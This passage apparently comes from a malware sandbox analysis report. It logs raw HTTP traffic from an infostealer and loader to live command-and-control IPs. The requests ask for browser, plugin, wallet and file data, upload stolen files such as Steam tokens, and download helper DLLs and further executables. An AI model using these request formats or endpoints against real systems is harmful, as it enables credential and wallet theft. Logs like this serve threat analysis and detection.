name="token"4d745d32989d168d36ce6680775699ce35729cf37b9a6ce5721eddc22d028d0ed3ce1e44------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="message"browsers------BGCAAFHIEBKJKEBFIEHD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 37 34 35 64 33 32 39 38 39 64 31 36 38 64 33 36 63 65 36 36 38 30 37 37 35 36 39 39 63 65 33 35 37 32 39 63 66 33 37 62 39 61 36 63 65 35 37 32 31 65 64 64 63 32 32 64 30 32 38 64 30 65 64 33 63 65 31 65 34 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 2d 2d 0d 0a Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"4d745d32989d168d36ce6680775699ce35729cf37b9a6ce5721eddc22d028d0ed3ce1e44------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="message"plugins------AEGIJKEHCAKFCAKFHDAA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 37 34 35 64 33 32 39 38 39 64 31 36 38 64 33 36 63 65 36 36 38 30 37 37 35 36 39 39 63 65 33 35 37 32 39 63 66 33 37 62 39 61 36 63 65 35 37 32 31 65 64 64 63 32 32 64 30 32 38 64 30 65 64 33 63 65 31 65 34 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"4d745d32989d168d36ce6680775699ce35729cf37b9a6ce5721eddc22d028d0ed3ce1e44------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="message"fplugins------FCBFBGDBKJKECAAKKFHD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDGHost: 185.215.113.206Content-Length: 7771Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: 185.215.113.206Content-Length: 991Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGHCBGDHJJKECAECBAHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDGHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 37 34 35 64 33 32 39 38 39 64 31 36 38 64 33 36 63 65 36 36 38 30 37 37 35 36 39 39 63 65 33 35 37 32 39 63 66 33 37 62 39 61 36 63 65 35 37 32 31 65 64 64 63 32 32 64 30 32 38 64 30 65 64 33 63 65 31 65 34 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="token"4d745d32989d168d36ce6680775699ce35729cf37b9a6ce5721eddc22d028d0ed3ce1e44------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="file"------DAAAKFHIEGDGCAAAEGDG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 37 34 35 64 33 32 39 38 39 64 31 36 38 64 33 36 63 65 36 36 38 30 37 37 35 36 39 39 63 65 33 35 37 32 39 63 66 33 37 62 39 61 36 63 65 35 37 32 31 65 64 64 63 32 32 64 30 32 38 64 30 65 64 33 63 65 31 65 34 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="token"4d745d32989d168d36ce6680775699ce35729cf37b9a6ce5721eddc22d028d0ed3ce1e44------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="file"------IDHCGDAFBKFIDHJJJDHC--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEHHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHCHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 37 34 35 64 33 32 39 38 39 64 31 36 38 64 33 36 63 65 36 36 38 30 37 37 35 36 39 39 63 65 33 35 37 32 39 63 66 33 37 62 39 61 36 63 65 35 37 32 31 65 64 64 63 32 32 64 30 32 38 64 30 65 64 33 63 65 31 65 34 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 2d 2d 0d 0a Data Ascii: ------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="token"4d745d32989d168d36ce6680775699ce35729cf37b9a6ce5721eddc22d028d0ed3ce1e44------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="message"wallets------AEGHIJEHJDHIDHIDAEHC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFIHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 37 34 35 64 33 32 39 38 39 64 31 36 38 64 33 36 63 65 36 36 38 30 37 37 35 36 39 39 63 65 33 35 37 32 39 63 66 33 37 62 39 61 36 63 65 35 37 32 31 65 64 64 63 32 32 64 30 32 38 64 30 65 64 33 63 65 31 65 34 34 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 2d 2d 0d 0a Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"4d745d32989d168d36ce6680775699ce35729cf37b9a6ce5721eddc22d028d0ed3ce1e44------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="message"files------FBFCGIDAKECGCBGDBAFI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCGIDHDAKJECBFHCBAAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 37 34 35 64 33 32 39 38 39 64 31 36 38 64 33 36 63 65 36 36 38 30 37 37 35 36 39 39 63 65 33 35 37 32 39 63 66 33 37 62 39 61 36 63 65 35 37 32 31 65 64 64 63 32 32 64 30 32 38 64 30 65 64 33 63 65 31 65 34 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 2d 2d 0d 0a Data Ascii: ------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="token"4d745d32989d168d36ce6680775699ce35729cf37b9a6ce5721eddc22d028d0ed3ce1e44------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="file"------DHCGIDHDAKJECBFHCBAA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 37 34 35 64 33 32 39 38 39 64 31 36 38 64 33 36 63 65 36 36 38 30 37 37 35 36 39 39 63 65 33 35 37 32 39 63 66 33 37 62 39 61 36 63 65 35 37 32 31 65 64 64 63 32 32 64 30 32 38 64 30 65 64 33 63 65 31 65 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 2d 2d 0d 0a Data Ascii: ------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="token"4d745d32989d168d36ce6680775699ce35729cf37b9a6ce5721eddc22d028d0ed3ce1e44------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="message"ybncbhylepme------KJEBKJDAFHJDGDHJKKEG--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJECHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 37 34 35 64 33 32 39 38 39 64 31 36 38 64 33 36 63 65 36 36 38 30 37 37 35 36 39 39 63 65 33 35 37 32 39 63 66 33 37 62 39 61 36 63 65 35 37 32 31 65 64 64 63 32 32 64 30 32 38 64 30 65 64 33 63 65 31 65 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 2d 2d 0d 0a Data Ascii: ------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="token"4d745d32989d168d36ce6680775699ce35729cf37b9a6ce5721eddc22d028d0ed3ce1e44------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JKJKKKJJJKJKFHJJJJEC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 38 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005812001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 38 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005813001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Tue, 12 Nov 2024 20:08:55 GMTIf-None-Match: "6733b5d7-1ba400"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 42 36 31 44 43 42 31 33 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="hwid"E3B61DCB13684217651120------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="build"mars------DAFIEHIEGDHIDGDGHDHJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 38 31 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005814031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 38 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005815001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 42 36 31 44 43 42 31 33 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 2d 2d 0d 0a Data Ascii: ------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="hwid"E3B61DCB13684217651120------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="build"mars------EBAKFIIJJKJJJJJJEGDA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
